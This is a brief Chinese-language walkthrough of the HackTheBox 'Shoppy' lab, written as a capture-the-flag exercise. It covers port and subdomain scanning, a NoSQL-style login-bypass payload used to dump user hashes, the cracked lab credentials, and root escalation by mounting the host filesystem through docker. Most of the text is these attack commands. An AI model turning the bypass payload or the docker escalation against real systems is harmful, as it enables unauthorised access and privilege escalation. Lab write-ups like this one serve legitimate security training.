HackTheBox Shoppy
端口扫描
nmap -sC -sS -sV 10.10.11.180 -o shoppy
echo "10.10.11.180 shoppy.htb" >> /etc/hosts
添加到hosts文件
目录扫描
扫描目录,只有login和admin可以正常访问,访问admin会直接跳转到login登陆页面
SQL注入之特殊的万能密码
查看访问源代码,没有发现什么
抓包瞅瞅,没有验证码校验,尝试万能密码登陆,但是这次这个万能密码我是头一次见 admin'||''==='
登陆后台来到admin页面,看到右上角有个搜索,尝试搜索一下
将刚才的万能密码放进去,发现出来两个账号,密码是md5加密
经过md5解密,获取到如下密码
admin:undefined
josh:remembermethisway
子域名扫描
获取到josh的账号密码,先来试试ssh登陆,但是失败了;心想肯定没这么简单,想到还没有进行子域名扫描,先来扫一波(可以同时用不同的字典进行扫描,可能会有意外的惊喜)
wfuzz -u shoppy.htb -H "Host:FUZZ.shoppy.htb" -w /usr/share/dnsenum/dns.txt --hl 7
josh:remembermethisway
使用这个账号密码可以成功登陆
查看各个页面有什么可用信息,发现jaeger和josh的对话中有jaeger的密码。
docker提权
username: jaeger
password: Sh0ppyBest@pp!
查看/home/deploy/password-manager
文件,注意:提示那里有点坑,单词和密码中间没有空格
sudo -u deploy /home/deploy/password-manager
查看用户id,发现存在docker,这下事情就变得简单了。
docker run -v /:/mnt --rm -it alpine chroot /mnt/ sh